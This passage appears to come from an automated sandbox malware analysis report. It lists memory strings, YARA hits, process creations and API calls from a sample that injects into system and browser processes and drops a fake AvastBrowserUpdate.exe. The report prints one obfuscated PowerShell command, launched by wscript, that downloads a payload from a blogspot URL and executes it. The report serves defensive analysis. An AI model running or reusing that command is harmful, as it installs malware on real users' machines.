                      Source: svchost.exe, 0000001B.00000003.289662292355.0000018CD5C5B000.00000004.00000020.00020000.00000000.sdmp, chrome.exe, 00000023.00000002.289693137102.000060C400FAC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
                      Source: chrome.exe, 00000023.00000002.289693023110.000060C400F94000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/search?q=
                      Source: chrome.exe, 00000023.00000002.289693023110.000060C400F94000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/search?q=&addon=opensearch
                      Source: chrome.exe, 00000023.00000002.289693023110.000060C400F94000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/search?q=&addon=opensearchn=opensearch
                      Source: chrome.exe, 00000023.00000002.289685268197.000060C400864000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.electronicexpress.com/cart
                      Source: chrome.exe, 00000023.00000002.289685268197.000060C400864000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.etsy.com/cart/
                      Source: chrome.exe, 00000023.00000002.289685268197.000060C400864000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.eyebuydirect.com/cart
                      Source: chrome.exe, 00000023.00000002.289685268197.000060C400864000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.fingerhut.com/cart/index
                      Source: chrome.exe, 00000023.00000002.289686437028.000060C400918000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.finishline.com/store/cart/cart.jsp
                      Source: chrome.exe, 00000023.00000002.289685268197.000060C400864000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.freepeople.com/cart/
                      Source: chrome.exe, 00000023.00000002.289685268197.000060C400864000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.gamestop.com/cart/
                      Source: svchost.exe, 0000001B.00000003.289672424265.0000018CD5643000.00000004.00000020.00020000.00000000.sdmp, chrome.exe, 00000023.00000002.289676724934.000060C400088000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000023.00000002.289680389343.000060C4003D8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com
                      Source: chrome.exe, 00000023.00000003.289661680901.000060C401030000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000023.00000002.289692653275.000060C400F2C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000023.00000002.289686622214.000060C400944000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/
                      Source: svchost.exe, 0000001B.00000003.289664137379.0000018CD5C68000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001B.00000003.289663937869.0000018CD5CDA000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001B.00000003.289740789317.0000018CD5639000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001B.00000003.289665008728.0000018CD56E7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001B.00000003.289716219780.0000018CD5639000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001B.00000003.289750972128.0000018CD5D02000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/chrome
                      Source: svchost.exe, 0000001B.00000003.289664137379.0000018CD5C52000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001B.00000003.289750972128.0000018CD5D02000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/chrome/
                      Source: chrome.exe, 00000023.00000002.289686838940.000060C400968000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/chrome/#safe
                      Source: svchost.exe, 0000001B.00000003.289664137379.0000018CD5C44000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/chrome/Google
                      Source: chrome.exe, 00000023.00000002.289686838940.000060C400968000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/chrome/browser-features/
                      Source: chrome.exe, 00000023.00000002.289686838940.000060C400968000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/chrome/browser-tools/
                      Source: svchost.exe, 0000001B.00000003.289664137379.0000018CD5C68000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001B.00000003.289663937869.0000018CD5CDA000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001B.00000003.289740789317.0000018CD5639000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001B.00000003.289665008728.0000018CD56E7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001B.00000003.289716219780.0000018CD5639000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001B.00000003.289750972128.0000018CD5D02000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/chrome/next-steps.html?statcb=0&installdataindex=empty&defaultbrowser=0
                      Source: C:\Users\user\AppData\Roaming\Avlogo\AvastBrowserUpdate.exe | Code function: 52_2_6B9014B6 lstrlenW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,GlobalFree,CloseClipboard
                      Source: svchost.exe, 00000013.00000003.289415524202.0000000005200000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: DirectInput8Creatememstr_ce58313c-9
                      Source: svchost.exe, 00000013.00000003.289415524202.0000000005200000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: GetRawInputDatamemstr_0a0765d4-6
                      Source: Yara match | File source: 19.3.svchost.exe.5200000.0.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 19.3.svchost.exe.5420000.7.raw.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 19.3.svchost.exe.5200000.6.raw.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 19.3.svchost.exe.5200000.6.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 19.3.svchost.exe.5420000.7.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 00000013.00000003.289415524202.0000000005200000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000013.00000003.289416235563.0000000005420000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: Process Memory Space: svchost.exe PID: 8420, type: MEMORYSTR
                      Source: C:\Windows\System32\svchost.exe | Code function: 27_2_00007DF4586D1364 CreateDesktopW,CreateProcessW,GetExitCodeProcess,TerminateProcess

                      System Summary

                      Source: C:\Windows\System32\wscript.exe | COM Object queried: Shell Automation Service HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{13709620-C279-11CE-A49E-444553540000}
                      Source: C:\Windows\System32\wscript.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ep Bypass -c [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12;& ('{1}{0}' -f 'ex', 'I') $(irm https://marchlkalanew6.blogspot.com/lundchikha.doc);Start-Sleep -Seconds 6;
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 7_2_05B7519A NtQueryInformationProcess
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 7_2_05B7B28B NtQueryInformationProcess
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 7_2_05B777F1 NtQuerySystemInformation,malloc,NtQuerySystemInformation,K32GetProcessImageFileNameW
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 7_2_05B754D6 NtQuerySystemInformation,malloc,NtQuerySystemInformation,RtlGetVersion,lstrcmpiW,CloseHandle,free
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 7_2_05B78A20 NtQueryInformationProcess
                      Source: C:\Windows\System32\svchost.exe | Code function: 27_2_0000018CD28F1CF4 NtAcceptConnectPort,CloseHandle
                      Source: C:\Windows\System32\svchost.exe | Code function: 27_2_0000018CD28F15C0 NtAcceptConnectPort
                      Source: C:\Windows\System32\svchost.exe | Code function: 27_2_00007DF4586DEEF0 NtAcceptConnectPort
                      Source: C:\Windows\System32\svchost.exe | Code function: 27_2_00007DF4586DFFDC RtlDosPathNameToNtPathName_U,NtAcceptConnectPort,NtAcceptConnectPort,free
                      Source: C:\Windows\System32\svchost.exe | Code function: 27_2_00007DF4586DEFCC NtAcceptConnectPort
                      Source: C:\Windows\System32\svchost.exe | Code function: 27_2_00007DF4586DEFAC NtAcceptConnectPort
                      Source: C:\Windows\System32\svchost.exe | Code function: 27_2_00007DF4586DF050 NtAcceptConnectPort
                      Source: C:\Windows\System32\svchost.exe | Code function: 27_2_00007DF4586DF0B8 NtAcceptConnectPort
                      Source: C:\Windows\System32\svchost.exe | Code function: 27_2_00007DF4586E0188 calloc,NtAcceptConnectPort,free
                      Source: C:\Windows\System32\svchost.exe | Code function: 27_2_00007DF4586DF244 NtAcceptConnectPort
                      Source: C:\Windows\System32\svchost.exe | Code function: 27_2_00007DF4586DF224 NtAcceptConnectPort
                      Source: C:\Windows\System32\svchost.exe | Code function: 27_2_00007DF4586DF3FC CreateFileMappingW,MapViewOfFile,DuplicateHandle,NtAcceptConnectPort
                      Source: C:\Windows\System32\svchost.exe | Code function: 27_2_00007DF4586DF76C calloc,DuplicateHandle,NtAcceptConnectPort,free,NtAcceptConnectPort,NtAcceptConnectPort
                      Source: C:\Program Files\Google\Chrome\Application\chrome.exe | Code function: 33_2_0000022D0AE3EF64 NtAcceptConnectPort
                      Source: C:\Program Files\Google\Chrome\Application\chrome.exe | Code function: 33_2_0000022D0AE3F19C NtAcceptConnectPort
                      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | Code function: 38_2_00000217CC61EED0 NtAcceptConnectPort
                      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | Code function: 38_2_00000217CC61EF64 NtAcceptConnectPort
                      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | Code function: 38_2_00000217CC61F19C NtAcceptConnectPort
                      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | Code function: 38_2_00000217CC61F16C NtAcceptConnectPort
                      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | Code function: 38_2_00000217CC61F140 NtAcceptConnectPort
                      Source: C:\Users\user\AppData\Roaming\Avlogo\AvastBrowserUpdate.exe | Code function: 52_3_7F23042F NtAllocateVirtualMemory,NtProtectVirtualMemory,NtProtectVirtualMemory
                      Source: C:\Users\user\AppData\Roaming\Avlogo\AvastBrowserUpdate.exe | Code function: 52_3_7F23066F NtProtectVirtualMemory
                      Source: C:\Users\user\AppData\Roaming\Avlogo\AvastBrowserUpdate.exe | Code function: 52_2_00E17FAB NtAllocateVirtualMemory,NtProtectVirtualMemory,VirtualFree
                      Source: C:\Users\user\AppData\Roaming\Avlogo\AvastBrowserUpdate.exe | Code function: 52_2_6B98FD38 CreateFileW,DeviceIoControl,CloseHandle
                      Source: C:\Users\user\AppData\Roaming\Avlogo\AvastBrowserUpdate.exe | Code function: 52_2_6B907333 OpenSCManagerW,OpenServiceW,DeleteService,CloseServiceHandle,CloseServiceHandle
                      Source: C:\Users\user\AppData\Roaming\Avlogo\AvastBrowserUpdate.exe | Code function: 52_2_6B8FF189 CreateProcessAsUserW
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 7_2_018D0C00
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 7_2_018D0860
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 7_2_018D0870
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 7_2_05B78FA8
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_05B730007_2_05B73000
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_05B7440E7_2_05B7440E
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_05B7AD4F7_2_05B7AD4F
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_069955407_2_06995540
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_02F30C008_2_02F30C00
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_02F30BF08_2_02F30BF0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_02F308708_2_02F30870
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_02F308608_2_02F30860
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_065955408_2_06595540
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 22_2_00007FFB357E173522_2_00007FFB357E1735
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 22_2_00007FFB357E290D22_2_00007FFB357E290D
                      Source: C:\Windows\System32\svchost.exeCode function: 27_3_0000018CD289252E27_3_0000018CD289252E
                      Source: C:\Windows\System32\svchost.exeCode function: 27_3_0000018CD2895EC827_3_0000018CD2895EC8
                      Source: C:\Windows\System32\svchost.exeCode function: 27_3_0000018CD28955C827_3_0000018CD28955C8
                      Source: C:\Windows\System32\svchost.exeCode function: 27_3_0000018CD289594827_3_0000018CD2895948
                      Source: C:\Windows\System32\svchost.exeCode function: 27_3_0000018CD28927D327_3_0000018CD28927D3
                      Source: C:\Windows\System32\svchost.exeCode function: 27_3_0000018CD2891BDD27_3_0000018CD2891BDD
                      Source: C:\Windows\System32\svchost.exeCode function: 27_3_0000018CD2892C7327_3_0000018CD2892C73
                      Source: C:\Windows\System32\svchost.exeCode function: 27_3_0000018CD2894A8427_3_0000018CD2894A84
                      Source: C:\Windows\System32\svchost.exeCode function: 27_2_0000018CD28F0C7027_2_0000018CD28F0C70
                      Source: C:\Windows\System32\svchost.exeCode function: 27_2_00007DF4586B286C27_2_00007DF4586B286C
                      Source: C:\Windows\System32\svchost.exeCode function: 27_2_00007DF4586C7E7427_2_00007DF4586C7E74
                      Source: C:\Windows\System32\svchost.exeCode function: 27_2_00007DF4586D136427_2_00007DF4586D1364
                      Source: C:\Windows\System32\svchost.exeCode function: 27_2_00007DF45872178427_2_00007DF458721784
                      Source: C:\Windows\System32\svchost.exeCode function: 27_2_00007DF45875A79027_2_00007DF45875A790
                      Source: C:\Windows\System32\svchost.exeCode function: 27_2_00007DF45879E90827_2_00007DF45879E908
                      Source: C:\Windows\System32\svchost.exeCode function: 27_2_00007DF4586DD8B827_2_00007DF4586DD8B8
                      Source: C:\Windows\System32\svchost.exeCode function: 27_2_00007DF4586F891027_2_00007DF4586F8910
                      Source: C:\Windows\System32\svchost.exeCode function: 27_2_00007DF4586BF9A027_2_00007DF4586BF9A0
                      Source: C:\Windows\System32\svchost.exeCode function: 27_2_00007DF4586D198C27_2_00007DF4586D198C
                      Source: C:\Windows\System32\svchost.exeCode function: 27_2_00007DF458705A0C27_2_00007DF458705A0C
                      Source: C:\Windows\System32\svchost.exeCode function: 27_2_00007DF45879A9E427_2_00007DF45879A9E4
                      Source: C:\Windows\System32\svchost.exeCode function: 27_2_00007DF458792A7C27_2_00007DF458792A7C
                      Source: C:\Windows\System32\svchost.exeCode function: 27_2_00007DF4586D1B5427_2_00007DF4586D1B54
                      Source: C:\Windows\System32\svchost.exeCode function: 27_2_00007DF458730AE427_2_00007DF458730AE4
                      Source: C:\Windows\System32\svchost.exeCode function: 27_2_00007DF4587A4C7027_2_00007DF4587A4C70
                      Source: C:\Windows\System32\svchost.exeCode function: 27_2_00007DF458725BEC27_2_00007DF458725BEC
                      Source: C:\Windows\System32\svchost.exeCode function: 27_2_00007DF4587BBD3027_2_00007DF4587BBD30
                      Source: C:\Windows\System32\svchost.exeCode function: 27_2_00007DF4587B8D6427_2_00007DF4587B8D64
                      Source: C:\Windows\System32\svchost.exeCode function: 27_2_00007DF45877DC7827_2_00007DF45877DC78
                      Source: C:\Windows\System32\svchost.exeCode function: 27_2_00007DF458703D2827_2_00007DF458703D28
                      Source: C:\Windows\System32\svchost.exeCode function: 27_2_00007DF45879EE3C27_2_00007DF45879EE3C
                      Source: C:\Windows\System32\svchost.exeCode function: 27_2_00007DF4587D7E4C27_2_00007DF4587D7E4C
                      Source: C:\Windows\System32\svchost.exeCode function: 27_2_00007DF4586ECD7427_2_00007DF4586ECD74
                      Source: C:\Windows\System32\svchost.exeCode function: 27_2_00007DF458751D7C27_2_00007DF458751D7C
                      Source: C:\Windows\System32\svchost.exeCode function: 27_2_00007DF458797D9427_2_00007DF458797D94
                      Source: C:\Windows\System32\svchost.exeCode function: 27_2_00007DF4586C5E4827_2_00007DF4586C5E48
                      Source: C:\Windows\System32\svchost.exeCode function: 27_2_00007DF45871CF2427_2_00007DF45871CF24
                      Source: C:\Windows\System32\svchost.exeCode function: 27_2_00007DF458710EA027_2_00007DF458710EA0
                      Source: C:\Windows\System32\svchost.exeCode function: 27_2_00007DF4587AC01027_2_00007DF4587AC010
                      Source: C:\Windows\System32\svchost.exeCode function: 27_2_00007DF458706FB027_2_00007DF458706FB0
                      Source: C:\Windows\System32\svchost.exeCode function: 27_2_00007DF4586B5FA027_2_00007DF4586B5FA0
                      Source: C:\Windows\System32\svchost.exeCode function: 27_2_00007DF45870D05027_2_00007DF45870D050
                      Source: C:\Windows\System32\svchost.exeCode function: 27_2_00007DF4586B105827_2_00007DF4586B1058
                      Source: C:\Windows\System32\svchost.exeCode function: 27_2_00007DF4586C404027_2_00007DF4586C4040
                      Source: C:\Windows\System32\svchost.exeCode function: 27_2_00007DF45879EFBC27_2_00007DF45879EFBC
                      Source: C:\Windows\System32\svchost.exeCode function: 27_2_00007DF45879DFB427_2_00007DF45879DFB4
                      Source: C:\Windows\System32\svchost.exeCode function: 27_2_00007DF45871D10027_2_00007DF45871D100
                      Source: C:\Windows\System32\svchost.exeCode function: 27_2_00007DF4587040B427_2_00007DF4587040B4
                      Source: C:\Windows\System32\svchost.exeCode function: 27_2_00007DF45870F0C427_2_00007DF45870F0C4
                      Source: C:\Windows\System32\svchost.exeCode function: 27_2_00007DF45871D21027_2_00007DF45871D210
                      Source: C:\Windows\System32\svchost.exeCode function: 27_2_00007DF4586E525427_2_00007DF4586E5254
                      Source: C:\Windows\System32\svchost.exeCode function: 27_2_00007DF45878E1EC27_2_00007DF45878E1EC
                      Source: C:\Windows\System32\svchost.exeCode function: 27_2_00007DF45871034427_2_00007DF458710344
                      Source: C:\Windows\System32\svchost.exeCode function: 27_2_00007DF45879F35427_2_00007DF45879F354
                      Source: C:\Windows\System32\svchost.exeCode function: 27_2_00007DF4586CF40827_2_00007DF4586CF408
                      Source: C:\Windows\System32\svchost.exeCode function: 27_2_00007DF4587AC52C27_2_00007DF4587AC52C
                      Source: C:\Windows\System32\svchost.exeCode function: 27_2_00007DF45879C4B027_2_00007DF45879C4B0
                      Source: C:\Windows\System32\svchost.exeCode function: 27_2_00007DF45879E4EC27_2_00007DF45879E4EC
                      Source: C:\Windows\System32\svchost.exeCode function: 27_2_00007DF4586C250027_2_00007DF4586C2500
                      Source: C:\Windows\System32\svchost.exeCode function: 27_2_00007DF45872D61027_2_00007DF45872D610
                      Source: C:\Windows\System32\svchost.exeCode function: 27_2_00007DF45871D66827_2_00007DF45871D668
                      Source: C:\Windows\System32\svchost.exeCode function: 27_2_00007DF4587056C027_2_00007DF4587056C0
                      Source: C:\Program Files\Google\Chrome\Application\chrome.exeCode function: 33_2_0000022D0AE8178433_2_0000022D0AE81784
                      Source: C:\Program Files\Google\Chrome\Application\chrome.exeCode function: 33_2_0000022D0AE656C033_2_0000022D0AE656C0
                      Source: C:\Program Files\Google\Chrome\Application\chrome.exeCode function: 33_2_0000022D0AE1286C33_2_0000022D0AE1286C
                      Source: C:\Program Files\Google\Chrome\Application\chrome.exeCode function: 33_2_0000022D0AEBA79033_2_0000022D0AEBA790
                      Source: C:\Program Files\Google\Chrome\Application\chrome.exeCode function: 33_2_0000022D0AF0C52C33_2_0000022D0AF0C52C
                      Source: C:\Program Files\Google\Chrome\Application\chrome.exeCode function: 33_2_0000022D0AE2250033_2_0000022D0AE22500
                      Source: C:\Program Files\Google\Chrome\Application\chrome.exeCode function: 33_2_0000022D0AEFE4EC33_2_0000022D0AEFE4EC
                      Source: C:\Program Files\Google\Chrome\Application\chrome.exeCode function: 33_2_0000022D0AE7D66833_2_0000022D0AE7D668
                      Source: C:\Program Files\Google\Chrome\Application\chrome.exeCode function: 33_2_0000022D0AE8D61033_2_0000022D0AE8D610
                      Source: C:\Program Files\Google\Chrome\Application\chrome.exeCode function: 33_2_0000022D0AE31B5433_2_0000022D0AE31B54
                      Source: C:\Program Files\Google\Chrome\Application\chrome.exeCode function: 33_2_0000022D0AEDDC7833_2_0000022D0AEDDC78
                      Source: C:\Program Files\Google\Chrome\Application\chrome.exeCode function: 33_2_0000022D0AE85BEC33_2_0000022D0AE85BEC
                      Source: C:\Program Files\Google\Chrome\Application\chrome.exeCode function: 33_2_0000022D0AE3198C33_2_0000022D0AE3198C
                      Source: C:\Program Files\Google\Chrome\Application\chrome.exeCode function: 33_2_0000022D0AE5891033_2_0000022D0AE58910
                      Source: C:\Program Files\Google\Chrome\Application\chrome.exeCode function: 33_2_0000022D0AEFE90833_2_0000022D0AEFE908
                      Source: C:\Program Files\Google\Chrome\Application\chrome.exeCode function: 33_2_0000022D0AE3D8B833_2_0000022D0AE3D8B8
                      Source: C:\Program Files\Google\Chrome\Application\chrome.exeCode function: 33_2_0000022D0AEF2A7C33_2_0000022D0AEF2A7C
                      Source: C:\Program Files\Google\Chrome\Application\chrome.exeCode function: 33_2_0000022D0AE65A0C33_2_0000022D0AE65A0C
                      Source: C:\Program Files\Google\Chrome\Application\chrome.exeCode function: 33_2_0000022D0AEFA9E433_2_0000022D0AEFA9E4
                      Source: C:\Program Files\Google\Chrome\Application\chrome.exeCode function: 33_2_0000022D0AE1F9A033_2_0000022D0AE1F9A0
                      Source: C:\Program Files\Google\Chrome\Application\chrome.exeCode function: 33_2_0000022D0AE7CF2433_2_0000022D0AE7CF24
                      Source: C:\Program Files\Google\Chrome\Application\chrome.exeCode function: 33_2_0000022D0AE70EA033_2_0000022D0AE70EA0
                      Source: C:\Program Files\Google\Chrome\Application\chrome.exeCode function: 33_2_0000022D0AE6D05033_2_0000022D0AE6D050
                      Source: C:\Program Files\Google\Chrome\Application\chrome.exeCode function: 33_2_0000022D0AE1105833_2_0000022D0AE11058
                      Source: C:\Program Files\Google\Chrome\Application\chrome.exeCode function: 33_2_0000022D0AF0C01033_2_0000022D0AF0C010
                      Source: C:\Program Files\Google\Chrome\Application\chrome.exeCode function: 33_2_0000022D0AF3F00833_2_0000022D0AF3F008
                      Source: C:\Program Files\Google\Chrome\Application\chrome.exeCode function: 33_2_0000022D0AE66FB033_2_0000022D0AE66FB0
                      Source: C:\Program Files\Google\Chrome\Application\chrome.exeCode function: 33_2_0000022D0AEFDFB433_2_0000022D0AEFDFB4
                      Source: C:\Program Files\Google\Chrome\Application\chrome.exeCode function: 33_2_0000022D0AEFEFBC33_2_0000022D0AEFEFBC
                      Source: C:\Program Files\Google\Chrome\Application\chrome.exeCode function: 33_2_0000022D0AE15FA033_2_0000022D0AE15FA0
                      Source: C:\Program Files\Google\Chrome\Application\chrome.exeCode function: 33_2_0000022D0AE4CD7433_2_0000022D0AE4CD74
                      Source: C:\Program Files\Google\Chrome\Application\chrome.exeCode function: 33_2_0000022D0AF18D6433_2_0000022D0AF18D64
                      Source: C:\Program Files\Google\Chrome\Application\chrome.exeCode function: 33_2_0000022D0AE63D2833_2_0000022D0AE63D28
                      Source: C:\Program Files\Google\Chrome\Application\chrome.exeCode function: 33_2_0000022D0AE27E7433_2_0000022D0AE27E74
                      Source: C:\Program Files\Google\Chrome\Application\chrome.exeCode function: 33_2_0000022D0AEFEE3C33_2_0000022D0AEFEE3C
                      Source: C:\Program Files\Google\Chrome\Application\chrome.exeCode function: 33_2_0000022D0AEF7D9433_2_0000022D0AEF7D94
                      Source: C:\Program Files\Google\Chrome\Application\chrome.exeCode function: 33_2_0000022D0AE3136433_2_0000022D0AE31364
                      Source: C:\Program Files\Google\Chrome\Application\chrome.exeCode function: 33_2_0000022D0AEFF35433_2_0000022D0AEFF354
                      Source: C:\Program Files\Google\Chrome\Application\chrome.exeCode function: 33_2_0000022D0AE7034433_2_0000022D0AE70344
                      Source: C:\Program Files\Google\Chrome\Application\chrome.exeCode function: 33_2_0000022D0AE2F40833_2_0000022D0AE2F408
                      Source: C:\Program Files\Google\Chrome\Application\chrome.exeCode function: 33_2_0000022D0AE7D10033_2_0000022D0AE7D100
                      Source: C:\Program Files\Google\Chrome\Application\chrome.exeCode function: 33_2_0000022D0AE640B433_2_0000022D0AE640B4
                      Source: C:\Program Files\Google\Chrome\Application\chrome.exeCode function: 33_2_0000022D0AE6F0C433_2_0000022D0AE6F0C4
                      Source: C:\Program Files\Google\Chrome\Application\chrome.exeCode function: 33_2_0000022D0AE7D21033_2_0000022D0AE7D210
                      Source: C:\Program Files\Google\Chrome\Application\chrome.exeCode function: 33_2_0000022D0AEEE1EC33_2_0000022D0AEEE1EC
                      Source: C:\Program Files (x86)\Microsoft\Edge\Application\128.0.2739.63\elevation_service.exeCode function: 34_2_00007FF6529DBBC034_2_00007FF6529DBBC0
                      Source: C:\Program Files (x86)\Microsoft\Edge\Application\128.0.2739.63\elevation_service.exeCode function: 34_2_00007FF6529D25D034_2_00007FF6529D25D0
                      Source: C:\Program Files (x86)\Microsoft\Edge\Application\128.0.2739.63\elevation_service.exeCode function: 34_2_00007FF6529DCDD034_2_00007FF6529DCDD0
                      Source: C:\Program Files (x86)\Microsoft\Edge\Application\128.0.2739.63\elevation_service.exeCode function: 34_2_00007FF6529D176034_2_00007FF6529D1760
                      Source: C:\Program Files (x86)\Microsoft\Edge\Application\128.0.2739.63\elevation_service.exeCode function: 34_2_00007FF6529D1D6034_2_00007FF6529D1D60
                      Source: C:\Program Files (x86)\Microsoft\Edge\Application\128.0.2739.63\elevation_service.exeCode function: 34_2_00007FF6529D3B7034_2_00007FF6529D3B70
                      Source: C:\Program Files (x86)\Microsoft\Edge\Application\128.0.2739.63\elevation_service.exeCode function: 34_2_00007FF6529DA7A034_2_00007FF6529DA7A0
                      Source: C:\Program Files (x86)\Microsoft\Edge\Application\128.0.2739.63\elevation_service.exeCode function: 34_2_00007FF6529DCBA834_2_00007FF6529DCBA8
                      Source: C:\Program Files (x86)\Microsoft\Edge\Application\128.0.2739.63\elevation_service.exeCode function: 34_2_00007FF6529D598034_2_00007FF6529D5980
                      Source: C:\Program Files (x86)\Microsoft\Edge\Application\128.0.2739.63\elevation_service.exeCode function: 34_2_00007FF6529D378034_2_00007FF6529D3780
                      Source: C:\Program Files (x86)\Microsoft\Edge\Application\128.0.2739.63\elevation_service.exeCode function: 34_2_00007FF6529D38E034_2_00007FF6529D38E0
                      Source: C:\Program Files (x86)\Microsoft\Edge\Application\128.0.2739.63\elevation_service.exeCode function: 34_2_00007FF6529DA4E034_2_00007FF6529DA4E0
                      Source: C:\Program Files (x86)\Microsoft\Edge\Application\128.0.2739.63\elevation_service.exeCode function: 34_2_00007FF6529DBAF234_2_00007FF6529DBAF2
                      Source: C:\Program Files (x86)\Microsoft\Edge\Application\128.0.2739.63\elevation_service.exeCode function: 34_2_00007FF6529D32C034_2_00007FF6529D32C0
                      Source: C:\Program Files (x86)\Microsoft\Edge\Application\128.0.2739.63\elevation_service.exeCode function: 34_2_00007FF6529D3D1034_2_00007FF6529D3D10
                      Source: C:\Program Files (x86)\Microsoft\Edge\Application\128.0.2739.63\elevation_service.exeCode function: 34_2_00007FF6529DAE4034_2_00007FF6529DAE40
                      Source: C:\Program Files (x86)\Microsoft\Edge\Application\128.0.2739.63\elevation_service.exeCode function: 34_2_00007FF6529DDE4034_2_00007FF6529DDE40
                      Source: C:\Program Files (x86)\Microsoft\Edge\Application\128.0.2739.63\elevation_service.exeCode function: 34_2_00007FF6529DB88034_2_00007FF6529DB880
                      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeCode function: 38_2_00000217CC611B5438_2_00000217CC611B54
                      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeCode function: 38_2_00000217CC665BEC38_2_00000217CC665BEC
                      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeCode function: 38_2_00000217CC6BDC7838_2_00000217CC6BDC78
                      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeCode function: 38_2_00000217CC643D2838_2_00000217CC643D28
                      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeCode function: 38_2_00000217CC6D7D9438_2_00000217CC6D7D94
                      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeCode function: 38_2_00000217CC6F8D6438_2_00000217CC6F8D64
                      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeCode function: 38_2_00000217CC62CD7438_2_00000217CC62CD74
                      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeCode function: 38_2_00000217CC650EA038_2_00000217CC650EA0
                      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeCode function: 38_2_00000217CC607E7438_2_00000217CC607E74
